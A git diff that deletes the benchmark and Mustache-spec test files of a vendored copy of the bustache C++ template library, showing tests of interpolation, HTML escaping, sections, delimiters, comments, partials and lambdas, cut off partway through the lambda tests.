diff --git a/thirdparty/bustache/test/benchmark.cpp b/thirdparty/bustache/test/benchmark.cpp
deleted file mode 100644
index d9b434c..0000000
--- a/thirdparty/bustache/test/benchmark.cpp
+++ /dev/null
@@ -1,238 +0,0 @@
-#include <benchmark/benchmark.h>
-#include <bustache/model.hpp>
-#include <mstch/mstch.hpp>
-#include <mustache.hpp>
-
-static char tmp[] =
-R"(<h1>{{header}}</h1>
-{{#bug}}
-{{/bug}}
-
-{{# items}}
-  {{#first}}
-    <li><strong>{{name}}</strong></li>
-  {{/first}}
-  {{#link}}
-    <li><a {{>href}}>{{name}}</a></li>
-  {{/link}}
-{{ /items}}
-
-{{#empty}}
-  <p>The list is empty.</p>
-{{/ empty }}
-
-{{=[ ]=}}
-
-[#array]([.])[/array]
-
-[#items]
-[count]->[count]->[count]
-[/items]
-
-[a.b.c] == [#a][#b][c][/b][/a]
-
-<div class="comments">
-    <h3>[header]</h3>
-    <ul>
-        [#comments]
-        <li class="comment">
-            <h5>[name]</h5>
-            <p>[body]</p>
-        </li>
-        <!--[count]-->
-        [/comments]
-    </ul>
-</div>)";
-
-static void bustache_usage(benchmark::State& state)
-{
-    using namespace bustache;
-
-    boost::unordered_map<std::string, bustache::format> context
-    {
-        {"href", "href=\"{{url}}\""_fmt}
-    };
-
-    int n = 0;
-    object data
-    {
-        {"header", "Colors"},
-        {"items",
-            array
-            {
-                object
-                {
-                    {"name", "red"},
-                    {"first", true},
-                    {"url", "#Red"}
-                },
-                object
-                {
-                    {"name", "green"},
-                    {"link", true},
-                    {"url", "#Green"}
-                },
-                object
-                {
-                    {"name", "blue"},
-                    {"link", true},
-                    {"url", "#Blue"}
-                }
-            }
-        },
-        {"empty", false},
-        {"count", [&n] { return ++n; }},
-        {"array", array{1, 2, 3}},
-        {"a", object{{"b", object{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                object
-                {
-                    {"name", "Joe"},
-                    {"body", "<html> should be escaped"}
-                },
-                object
-                {
-                    {"name", "Sam"},
-                    {"body", "{{mustache}} can be seen"}
-                },
-                object
-                {
-                    {"name", "New"},
-                    {"body", "break\nup"}
-                }
-            }
-        }
-    };
-
-    format fmt(tmp);
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        to_string(fmt(data, context, escape_html));
-    }
-}
-
-static void mstch_usage(benchmark::State& state)
-{
-    using namespace mstch;
-    using namespace std::string_literals;
-
-    std::map<std::string, std::string> context
-    {
-        {"href", "href=\"{{url}}\""}
-    };
-
-    int n = 0;
-    map data
-    {
-        {"header", "Colors"s},
-        {"items",
-            array
-            {
-                map
-                {
-                    {"name", "red"s},
-                    {"first", true},
-                    {"url", "#Red"s}
-                },
-                map
-                {
-                    {"name", "green"s},
-                    {"link", true},
-                    {"url", "#Green"s}
-                },
-                map
-                {
-                    {"name", "blue"s},
-                    {"link", true},
-                    {"url", "#Blue"s}
-                }
-            }
-        },
-        {"empty", false},
-        {"count", lambda{[&n]() -> node { return ++n; }}},
-        {"array", array{1, 2, 3}},
-        {"a", map{{"b", map{{"c", true}}}}},
-        {"comments",
-            array
-            {
-                map
-                {
-                    {"name", "Joe"s},
-                    {"body", "<html> should be escaped"s}
-                },
-                map
-                {
-                    {"name", "Sam"s},
-                    {"body", "{{mustache}} can be seen"s}
-                },
-                map
-                {
-                    {"name", "New"s},
-                    {"body", "break\nup"s}
-                }
-            }
-        }
-    };
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        render(tmp, data, context);
-    }
-}
-
-static void kainjow_usage(benchmark::State& state)
-{
-    using namespace Kainjow;
-    using Data = Mustache::Data;
-
-    int n = 0;
-    Data data;
-    data.set("header", "Colors");
-    {
-        Data d1, d2, d3;
-        d1.set("name", "red");
-        d1.set("first", Data::Type::True);
-        d1.set("url", "#Red");
-        d2.set("name", "green");
-        d2.set("link", Data::Type::True);
-        d2.set("url", "#Green");
-        d3.set("name", "blue");
-        d3.set("link", Data::Type::True);
-        d3.set("url", "#Blue");
-        data.set("items", Data::ListType{d1, d2, d3});
-    }
-    data.set("empty", Data::Type::False);
-    data.set("count", Data::LambdaType{[&n](const std::string&) { return std::to_string(++n); }});
-    data.set("array", Data::ListType{"1", "2", "3"});
-    data.set("a", {"b",{"c", "true"}});
-    {
-        Data d1, d2, d3;
-        d1.set("name", "Joe");
-        d1.set("body", "<html> should be escaped");
-        d2.set("name", "Sam");
-        d2.set("body", "{{mustache}} can be seen");
-        d3.set("name", "New");
-        d3.set("body", "break\nup");
-        data.set("comments", Data::ListType{d1, d2, d3});
-    }
-    data.set("href", Data::PartialType{[]() { return "href=\"{{url}}\""; }});
-
-    Mustache fmt(tmp);
-
-    while (state.KeepRunning())
-    {
-        n = 0;
-        fmt.render(data);
-    }
-}
-
-BENCHMARK(bustache_usage);
-BENCHMARK(mstch_usage);
-BENCHMARK(kainjow_usage);
-
-BENCHMARK_MAIN();
\ No newline at end of file
diff --git a/thirdparty/bustache/test/specs.cpp b/thirdparty/bustache/test/specs.cpp
deleted file mode 100644
index 617ed1d..0000000
--- a/thirdparty/bustache/test/specs.cpp
+++ /dev/null
@@ -1,714 +0,0 @@
-/*//////////////////////////////////////////////////////////////////////////////
-    Copyright (c) 2016 Jamboree
-
-    Distributed under the Boost Software License, Version 1.0. (See accompanying
-    file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
-//////////////////////////////////////////////////////////////////////////////*/
-#define CATCH_CONFIG_MAIN
-#include <catch.hpp>
-#include <bustache/model.hpp>
-#include <boost/unordered_map.hpp>
-
-using namespace bustache;
-using context = boost::unordered_map<std::string, format>;
-
-TEST_CASE("interpolation")
-{
-    object const empty;
-
-    // No Interpolation
-    CHECK(to_string("Hello from {Mustache}!"_fmt(empty)) == "Hello from {Mustache}!");
-
-    // Basic Interpolation
-    CHECK(to_string("Hello, {{subject}}!"_fmt(object{{"subject", "world"}})) == "Hello, world!");
-
-    // HTML Escaping
-    CHECK(to_string("These characters should be HTML escaped: {{forbidden}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should be HTML escaped: &amp; &quot; &lt; &gt;");
-
-    // Triple Mustache
-    CHECK(to_string("These characters should not be HTML escaped: {{{forbidden}}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should not be HTML escaped: & \" < >");
-
-    // Ampersand
-    CHECK(to_string("These characters should not be HTML escaped: {{&forbidden}}"_fmt(object{{"forbidden", "& \" < >"}}, escape_html))
-        == "These characters should not be HTML escaped: & \" < >");
-
-    // Basic Integer Interpolation
-    CHECK(to_string(R"("{{mph}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Triple Mustache Integer Interpolation
-    CHECK(to_string(R"("{{{mph}}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Ampersand Integer Interpolation
-    CHECK(to_string(R"("{{&mph}} miles an hour!")"_fmt(object{{"mph", 85}})) == R"("85 miles an hour!")");
-
-    // Basic Decimal Interpolation
-    CHECK(to_string(R"("{{power}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Triple Decimal Interpolation
-    CHECK(to_string(R"("{{{power}}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Ampersand Decimal Interpolation
-    CHECK(to_string(R"("{{&power}} jiggawatts!")"_fmt(object{{"power", 1.21}})) == R"("1.21 jiggawatts!")");
-
-    // Context Misses
-    {
-        // Basic Context Miss Interpolation
-        CHECK(to_string("I ({{cannot}}) be seen!"_fmt(empty)) == "I () be seen!");
-
-        // Triple Mustache Context Miss Interpolation
-        CHECK(to_string("I ({{{cannot}}}) be seen!"_fmt(empty)) == "I () be seen!");
-
-        // Ampersand Context Miss Interpolation
-        CHECK(to_string("I ({{&cannot}}) be seen!"_fmt(empty)) == "I () be seen!");
-    }
-
-    // Dotted Names
-    {
-        // Dotted Names - Basic Interpolation
-        CHECK(to_string(R"("{{person.name}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Triple Mustache Interpolation
-        CHECK(to_string(R"("{{{person.name}}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Ampersand Interpolation
-        CHECK(to_string(R"("{{&person.name}}" == "{{#person}}{{name}}{{/person}}")"_fmt(object{{"person", object{{"name", "Joe"}}}})) == R"("Joe" == "Joe")");
-
-        // Dotted Names - Arbitrary Depth
-        CHECK(to_string(R"("{{a.b.c.d.e.name}}" == "Phil")"_fmt(
-            object{{"a", object{{"b", object{{"c", object{{"d", object{{"e", object{{"name", "Phil"}}}}}}}}}}}}))
-            == R"("Phil" == "Phil")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{a.b.c}}" == "")"_fmt(empty)) == R"("" == "")");
-
-        // Dotted Names - Broken Chain Resolution
-        CHECK(to_string(R"("{{a.b.c.name}}" == "")"_fmt(
-            object{
-                {"a", object{{"b", empty}}},
-                {"c", object{{"name", "Jim"}}}
-            })) == R"("" == "")");
-
-        // Dotted Names - Initial Resolution
-        CHECK(to_string(R"("{{#a}}{{b.c.d.e.name}}{{/a}}" == "Phil")"_fmt(
-            object{
-                {"a", object{{"b", object{{"c", object{{"d", object{{"e", object{{"name", "Phil"}}}}}}}}}}},
-                {"c", object{{"c", object{{"d", object{{"e", object{{"name", "Wrong"}}}}}}}}}
-        })) == R"("Phil" == "Phil")");
-
-        // Dotted Names - Context Precedence
-        CHECK(to_string("{{#a}}{{b.c}}{{/a}}"_fmt(object{{"b", empty}, {"c", "ERROR"}})) == "");
-    }
-
-    object s{{"string", "---"}};
-
-    // Whitespace Sensitivity
-    {
-        // Interpolation - Surrounding Whitespace
-        CHECK(to_string("| {{string}} |"_fmt(s)) == "| --- |");
-
-        // Triple Mustache - Surrounding Whitespace
-        CHECK(to_string("| {{{string}}} |"_fmt(s)) == "| --- |");
-
-        // Ampersand - Surrounding Whitespace
-        CHECK(to_string("| {{&string}} |"_fmt(s)) == "| --- |");
-
-        // Interpolation - Standalone
-        CHECK(to_string("  {{string}}\n"_fmt(s)) == "  ---\n");
-
-        // Triple Mustache - Standalone
-        CHECK(to_string("  {{{string}}}\n"_fmt(s)) == "  ---\n");
-
-        // Ampersand - Standalone
-        CHECK(to_string("  {{&string}}\n"_fmt(s)) == "  ---\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Interpolation With Padding
-        CHECK(to_string("|{{ string }}|"_fmt(s)) == "|---|");
-
-        // Triple Mustache With Padding
-        CHECK(to_string("|{{{ string }}}|"_fmt(s)) == "|---|");
-
-        // Ampersand With Padding
-        CHECK(to_string("|{{& string }}|"_fmt(s)) == "|---|");
-    }
-}
-
-TEST_CASE("sections")
-{
-    object const empty;
-
-    // Truthy
-    CHECK(to_string(R"("{{#boolean}}This should be rendered.{{/boolean}}")"_fmt(object{{"boolean", true}}))
-        == R"("This should be rendered.")");
-
-    // Falsey
-    CHECK(to_string(R"("{{#boolean}}This should not be rendered.{{/boolean}}")"_fmt(object{{"boolean", false}}))
-        == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{#context}}Hi {{name}}.{{/context}}")"_fmt(object{{"context", object{{"name", "Joe"}}}}))
-        == R"("Hi Joe.")");
-
-    // Deeply Nested Contexts
-    CHECK(to_string(
-        "{{#a}}\n"
-        "{{one}}\n"
-        "{{#b}}\n"
-        "{{one}}{{two}}{{one}}\n"
-        "{{#c}}\n"
-        "{{one}}{{two}}{{three}}{{two}}{{one}}\n"
-        "{{#d}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{#e}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{five}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{/e}}\n"
-        "{{one}}{{two}}{{three}}{{four}}{{three}}{{two}}{{one}}\n"
-        "{{/d}}\n"
-        "{{one}}{{two}}{{three}}{{two}}{{one}}\n"
-        "{{/c}}\n"
-        "{{one}}{{two}}{{one}}\n"
-        "{{/b}}\n"
-        "{{one}}\n"
-        "{{/a}}"_fmt(object{
-            {"a", object{{"one", 1}}},
-            {"b", object{{"two", 2}}},
-            {"c", object{{"three", 3}}},
-            {"d", object{{"four", 4}}},
-            {"e", object{{"five", 5}}}}))
-        == 
-        "1\n"
-        "121\n"
-        "12321\n"
-        "1234321\n"
-        "123454321\n"
-        "1234321\n"
-        "12321\n"
-        "121\n"
-        "1\n");
-
-    // List
-    CHECK(to_string(R"("{{#list}}{{item}}{{/list}}")"_fmt(object{{"list", array{object{{"item", 1}}, object{{"item", 2}}, object{{"item", 3}}}}}))
-        == R"("123")");
-
-    // Empty List
-    CHECK(to_string(R"("{{#list}}Yay lists!{{/list}}")"_fmt(object{{"list", array{}}})) == R"("")");
-
-    // Doubled
-    CHECK(to_string(
-        "{{#bool}}\n"
-        "* first\n"
-        "{{/bool}}\n"
-        "* {{two}}\n"
-        "{{#bool}}\n"
-        "* third\n"
-        "{{/bool}}"_fmt(object{{"bool", true}, {"two", "second"}}))
-        == 
-        "* first\n"
-        "* second\n"
-        "* third\n");
-
-    // Nested (Truthy)
-    CHECK(to_string("| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", true}})) == "| A B C D E |");
-
-    // Nested (Falsey)
-    CHECK(to_string("| A {{#bool}}B {{#bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", false}})) == "| A  E |");
-
-    // Context Misses
-    CHECK(to_string("[{{#missing}}Found key 'missing'!{{/missing}}]"_fmt(empty)) == "[]");
-
-    // Implicit Iterators
-    {
-        // Implicit Iterator - String
-        CHECK(to_string(R"#("{{#list}}({{.}}){{/list}}")#"_fmt(object{{"list", array{1, 2, 3, 4, 5}}})) == R"#("(1)(2)(3)(4)(5)")#");
-
-        // Implicit Iterator - Decimal
-        CHECK(to_string(R"#("{{#list}}({{.}}){{/list}}")#"_fmt(object{{"list", array{1.1, 2.2, 3.3, 4.4, 5.5}}})) == R"#("(1.1)(2.2)(3.3)(4.4)(5.5)")#");
-
-        // Implicit Iterator - Array
-        CHECK(to_string(R"#("{{#list}}({{#.}}{{.}}{{/.}}){{/list}}")#"_fmt(object{{"list", array{array{1, 2, 3}, array{"a", "b", "c"}}}})) == R"#("(123)(abc)")#");
-    }
-
-    // Dotted Names
-    {
-        // Dotted Names - Truthy
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "Here")"_fmt(object{{"a", object{{"b", object{{"c", true}}}}}})) == R"("Here" == "Here")");
-
-        // Dotted Names - Falsey
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "")"_fmt(object{{"a", object{{"b", object{{"c", false}}}}}})) == R"("" == "")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{#a.b.c}}Here{{/a.b.c}}" == "")"_fmt(object{{"a", empty}})) == R"("" == "")");
-    }
-
-    object const o{{"boolean", true}};
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string(" | {{#boolean}}\t|\t{{/boolean}} | \n"_fmt(o)) == " | \t|\t | \n");
-
-        // Internal Whitespace
-        CHECK(to_string(" | {{#boolean}} {{! Important Whitespace }}\n {{/boolean}} | \n"_fmt(o)) == " |  \n  | \n");
-
-        // Indented Inline Sections
-        CHECK(to_string(" {{#boolean}}YES{{/boolean}}\n {{#boolean}}GOOD{{/boolean}}\n"_fmt(o)) == " YES\n GOOD\n");
-
-        // Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "{{#boolean}}\n"
-            "|\n"
-            "{{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        // Indented Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "  {{#boolean}}\n"
-            "|\n"
-            "  {{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        //  Standalone Line Endings
-        CHECK(to_string("|\r\n{{#boolean}}\r\n{{/boolean}}\r\n|"_fmt(o)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{#boolean}}\n#{{/boolean}}\n/"_fmt(o)) == "#\n/");
-
-        // Standalone Without Newline
-        CHECK(to_string("#{{#boolean}}\n/\n  {{/boolean}}"_fmt(o)) == "#\n/\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        CHECK(to_string("|{{# boolean }}={{/ boolean }}|"_fmt(o)) == "|=|");
-    }
-}
-
-TEST_CASE("inverted")
-{
-    object const empty;
-
-    // Falsey
-    CHECK(to_string(R"("{{^boolean}}This should be rendered.{{/boolean}}")"_fmt(object{{"boolean", false}})) == R"("This should be rendered.")");
-
-    // Truthy
-    CHECK(to_string(R"("{{^boolean}}This should not be rendered.{{/boolean}}")"_fmt(object{{"boolean", true}})) == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{^context}}Hi {{name}}.{{/context}}")"_fmt(object{{"context", object{{"name", "Joe"}}}})) == R"("")");
-
-    // List
-    CHECK(to_string(R"("{{^list}}{{n}}{{/list}}")"_fmt(object{{"list", array{object{{"n", 1}}, object{{"n", 2}}, object{{"n", 3}}}}})) == R"("")");
-
-    // Empty List
-    CHECK(to_string(R"("{{^list}}Yay lists!{{/list}}")"_fmt(object{{"list", array{}}})) == R"("Yay lists!")");
-
-    // Doubled
-    CHECK(to_string(
-        "{{^bool}}\n"
-        "* first\n"
-        "{{/bool}}\n"
-        "* {{two}}\n"
-        "{{^bool}}\n"
-        "* third\n"
-        "{{/bool}}"_fmt(object{{"bool", false}, {"two", "second"}}))
-        ==
-        "* first\n"
-        "* second\n"
-        "* third\n");
-
-    // Nested (Falsey)
-    CHECK(to_string("| A {{^bool}}B {{^bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", false}})) == "| A B C D E |");
-
-    // Nested (Truthy)
-    CHECK(to_string("| A {{^bool}}B {{^bool}}C{{/bool}} D{{/bool}} E |"_fmt(object{{"bool", true}})) == "| A  E |");
-
-    // Context Misses
-    CHECK(to_string("[{{^missing}}Cannot find key 'missing'!{{/missing}}]"_fmt(empty)) == "[Cannot find key 'missing'!]");
-
-    // Dotted Names
-    {
-        // Dotted Names - Truthy
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "")"_fmt(object{{"a", object{{"b", object{{"c", true}}}}}})) == R"("" == "")");
-
-        // Dotted Names - Falsey
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "Not Here")"_fmt(object{{"a", object{{"b", object{{"c", false}}}}}})) == R"("Not Here" == "Not Here")");
-
-        // Dotted Names - Broken Chains
-        CHECK(to_string(R"("{{^a.b.c}}Not Here{{/a.b.c}}" == "Not Here")"_fmt(object{{"a", empty}})) == R"("Not Here" == "Not Here")");
-    }
-
-    object const o{{"boolean", false}};
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string(" | {{^boolean}}\t|\t{{/boolean}} | \n"_fmt(o)) == " | \t|\t | \n");
-
-        // Internal Whitespace
-        CHECK(to_string(" | {{^boolean}} {{! Important Whitespace }}\n {{/boolean}} | \n"_fmt(o)) == " |  \n  | \n");
-
-        // Indented Inline Sections
-        CHECK(to_string(" {{^boolean}}YES{{/boolean}}\n {{^boolean}}GOOD{{/boolean}}\n"_fmt(o)) == " YES\n GOOD\n");
-
-        // Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "{{^boolean}}\n"
-            "|\n"
-            "{{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        // Indented Standalone Lines
-        CHECK(to_string(
-            "| This Is\n"
-            "  {{^boolean}}\n"
-            "|\n"
-            "  {{/boolean}}\n"
-            "| A Line"_fmt(o))
-            ==
-            "| This Is\n"
-            "|\n"
-            "| A Line");
-
-        //  Standalone Line Endings
-        CHECK(to_string("|\r\n{{^boolean}}\r\n{{/boolean}}\r\n|"_fmt(o)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{^boolean}}\n#{{/boolean}}\n/"_fmt(o)) == "#\n/");
-
-        // Standalone Without Newline
-        CHECK(to_string("#{{^boolean}}\n/\n  {{/boolean}}"_fmt(o)) == "#\n/\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        CHECK(to_string("|{{^ boolean }}={{/ boolean }}|"_fmt(o)) == "|=|");
-    }
-}
-
-TEST_CASE("delimiters")
-{
-    // Pair Behavior
-    CHECK(to_string("{{=<% %>=}}(<%text%>)"_fmt(object{{"text", "Hey!"}})) == "(Hey!)");
-
-    // Special Characters
-    CHECK(to_string("({{=[ ]=}}[text])"_fmt(object{{"text", "It worked!"}})) == "(It worked!)");
-
-    // Sections
-    CHECK(to_string(
-        "[\n"
-        "{{#section}}\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "{{/section}}\n"
-        "{{= | | =}}\n"
-        "|#section|\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "|/section|\n"
-        "]"_fmt(object{{"section", true}, {"data", "I got interpolated."}}))
-        == 
-        "[\n"
-        "  I got interpolated.\n"
-        "  |data|\n"
-        "  {{data}}\n"
-        "  I got interpolated.\n"
-        "]");
-
-    // Inverted Sections
-    CHECK(to_string(
-        "[\n"
-        "{{^section}}\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "{{/section}}\n"
-        "{{= | | =}}\n"
-        "|^section|\n"
-        "  {{data}}\n"
-        "  |data|\n"
-        "|/section|\n"
-        "]"_fmt(object{{"section", false},{"data", "I got interpolated."}}))
-        ==
-        "[\n"
-        "  I got interpolated.\n"
-        "  |data|\n"
-        "  {{data}}\n"
-        "  I got interpolated.\n"
-        "]");
-
-    // Partial Inheritence
-    CHECK(to_string(
-        "[ {{>include}} ]\n"
-        "{{= | | =}}\n"
-        "[ |>include| ]"_fmt(object{{"value", "yes"}}, context{{"include", ".{{value}}."_fmt}}))
-        ==
-        "[ .yes. ]\n"
-        "[ .yes. ]");
-
-    // Post-Partial Behavior
-    CHECK(to_string(
-        "[ {{>include}} ]\n"
-        "[ .{{value}}.  .|value|. ]"_fmt(object{{"value", "yes"}}, context{{"include", ".{{value}}. {{= | | =}} .|value|."_fmt}}))
-        ==
-        "[ .yes.  .yes. ]\n"
-        "[ .yes.  .|value|. ]");
-
-    object const empty;
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string("| {{=@ @=}} |"_fmt(empty)) == "|  |");
-
-        // Outlying Whitespace (Inline)
-        CHECK(to_string(" | {{=@ @=}}\n"_fmt(empty)) == " | \n");
-
-        // Standalone Tag
-        CHECK(to_string(
-            "Begin.\n"
-            "{{=@ @=}}\n"
-            "End."_fmt(empty))
-            == 
-            "Begin.\n"
-            "End.");
-
-        // Indented Standalone Tag
-        CHECK(to_string(
-            "Begin.\n"
-            "  {{=@ @=}}\n"
-            "End."_fmt(empty))
-            ==
-            "Begin.\n"
-            "End.");
-
-        // Standalone Line Endings
-        CHECK(to_string("|\r\n{{= @ @ =}}\r\n|"_fmt(empty)) == "|\r\n|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{=@ @=}}\n="_fmt(empty)) == "=");
-
-        // Standalone Without Newline
-        CHECK(to_string("=\n  {{=@ @=}}"_fmt(empty)) == "=\n");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Pair with Padding
-        CHECK(to_string("|{{= @   @ =}}|"_fmt(empty)) == "||");
-    }
-}
-
-TEST_CASE("comments")
-{
-    object const empty;
-
-    // Inline
-    CHECK(to_string("12345{{! Comment Block! }}67890"_fmt(empty)) == "1234567890");
-
-    // Multiline
-    CHECK(to_string(
-        "12345{{!\n"
-        "  This is a\n"
-        "  multi-line comment...\n"
-        "}}67890"_fmt(empty))
-        == 
-        "1234567890");
-
-    // Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "{{! Comment Block! }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "  {{! Comment Block! }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Standalone Line Endings
-    CHECK(to_string("|\r\n{{! Standalone Comment }}\r\n|"_fmt(empty)) == "|\r\n|");
-
-    // Standalone Without Previous Line
-    CHECK(to_string("  {{! I'm Still Standalone }}\n!"_fmt(empty)) == "!");
-
-    // Standalone Without Newline
-    CHECK(to_string("!\n  {{! I'm Still Standalone }}"_fmt(empty)) == "!\n");
-
-    // Multiline Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "{{!\n"
-        "Something's going on here...\n"
-        "}}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Multiline Standalone
-    CHECK(to_string(
-        "Begin.\n"
-        "  {{!\n"
-        "    Something's going on here...\n"
-        "  }}\n"
-        "End."_fmt(empty))
-        ==
-        "Begin.\n"
-        "End.");
-
-    // Indented Inline
-    CHECK(to_string("  12 {{! 34 }}\n"_fmt(empty)) == "  12 \n");
-
-    // Surrounding Whitespace
-    CHECK(to_string("12345 {{! Comment Block! }} 67890"_fmt(empty)) == "12345  67890");
-}
-
-TEST_CASE("partials")
-{
-    object const empty;
-
-    // Basic Behavior
-    CHECK(to_string(R"("{{>text}}")"_fmt(empty, context{{"text", "from partial"_fmt}})) == R"("from partial")");
-
-    // Failed Lookup
-    CHECK(to_string(R"("{{>text}}")"_fmt(empty)) == R"("")");
-
-    // Context
-    CHECK(to_string(R"("{{>partial}}")"_fmt(object{{"text", "content"}}, context{{"partial", "*{{text}}*"_fmt}})) == R"("*content*")");
-
-    // Recursion
-    CHECK(to_string("{{>node}}"_fmt(object{
-        {"content", "X"},
-        {"nodes", array{object{{"content", "Y"}, {"nodes", array{}}}}}
-    }, context{{"node", "{{content}}<{{#nodes}}{{>node}}{{/nodes}}>"_fmt}})) == "X<Y<>>");
-
-    // Whitespace Sensitivity
-    {
-        // Surrounding Whitespace
-        CHECK(to_string("| {{>partial}} |"_fmt(empty, context{{"partial", "\t|\t"_fmt}})) == "| \t|\t |");
-
-        // Inline Indentation
-        CHECK(to_string("  {{data}}  {{> partial}}\n"_fmt(object{{"data", "|"}}, context{{"partial", ">\n>"_fmt}})) == "  |  >\n>\n");
-
-        // Standalone Line Endings
-        CHECK(to_string("|\r\n{{>partial}}\r\n|"_fmt(empty, context{{"partial", ">"_fmt}})) == "|\r\n>|");
-
-        // Standalone Without Previous Line
-        CHECK(to_string("  {{>partial}}\n>"_fmt(empty, context{{"partial", ">\n>"_fmt}})) == "  >\n  >>");
-
-        // Standalone Without Newline
-        CHECK(to_string(">\n  {{>partial}}"_fmt(empty, context{{"partial", ">\n>"_fmt}})) == ">\n  >\n  >");
-
-        // Standalone Indentation
-        CHECK(to_string(
-            "\\\n"
-            " {{>partial}}\n"
-            "/"_fmt(object{{"content", "<\n->"}},
-                context{{"partial",
-                "|\n"
-                "{{{content}}}\n"
-                "|\n"_fmt}}))
-            == 
-            "\\\n"
-            " |\n"
-            " <\n"
-            "->\n"
-            " |\n"
-            "/");
-    }
-
-    // Whitespace Insensitivity
-    {
-        // Padding Whitespace
-        CHECK(to_string("|{{> partial }}|"_fmt(empty, context{{"partial", "[]"_fmt}})) == "|[]|");
-    }
-}
-
-TEST_CASE("lambdas")
-{
-    // Interpolation
-    CHECK(to_string("Hello, {{lambda}}!"_fmt(object{{"lambda", [] { return "world"; }}})) == "Hello, world!");
-
-    // Interpolation - Expansion
-    CHECK(to_string(
-        "Hello, {{lambda}}!"_fmt(object{
-            {"lambda", [] { return "{{planet}}"_fmt; }},
-            {"planet", "world"}}))
-        ==
-        "Hello, world!");
-
-    // Interpolation - Alternate Delimiters
-    CHECK(to_string(
-        "{{= | | =}}\nHello, (|&lambda|)!"_fmt(object{
-            {"lambda", [] { return "|planet| => {{planet}}"_fmt; }},
-            {"planet", "world"}}))
-        ==
-        "Hello, (|planet| => world)!");
-
-    // Interpolation - Multiple Calls
-    CHECK(to_string(
-        "{{lambda}} == {{{lambda}}} == {{lambda}}"_fmt(object{
-            {"lambda", [n = 0]() mutable { return ++n; }}}))
-        ==
-        "1 == 2 == 3");
-
-    // Escaping
-    CHECK(to_string("<{{lambda}}{{{lambda}}}"_fmt(object{{"lambda", [] { return ">"; }}}, escape_html)) == "<&gt;>");
-
-    // Section - Expansion
-    CHECK(to_string("<{{#lambda}}-{{/lambda}}>"_fmt(object{
-        {"lambda", [](ast::content_list const& contents) {
-            ast::content_list list;
-            list.insert(list.end(), contents.begin(), contents.end());
-            list.push_back(ast::variable{"planet"});
-            list.insert(list.end(), contents.begin(), contents.end());
-            return format(std::move(list), false);
-        }},
-        {"planet", "Earth"}}))
-        ==
-        "<-Earth->");
-
-    // Section - Multiple Calls
-    CHECK(to_string("{{#lambda}}FILE{{/lambda}} != {{#lambda}}LINE{{/lambda}}"_fmt(object{
-        {"lambda", [](ast::content_list const& contents) {
-            ast::content_list list;
-            list.push_back(ast::text("__"));
-            list.insert(list.end(), contents.begin(), contents.end());
-            list.push_back(ast::text("__"));
-            return format(std::move(list), false);
-        }}}))
-        ==
-        "__FILE__ != __LINE__");
-
-    // Inverted Section
-    CHECK(to_string("<{{^lambda}}{{static}}{{/lambda}}>"_fmt(object{
-        {"lambda", [](ast::content_list const&) { return false; }},
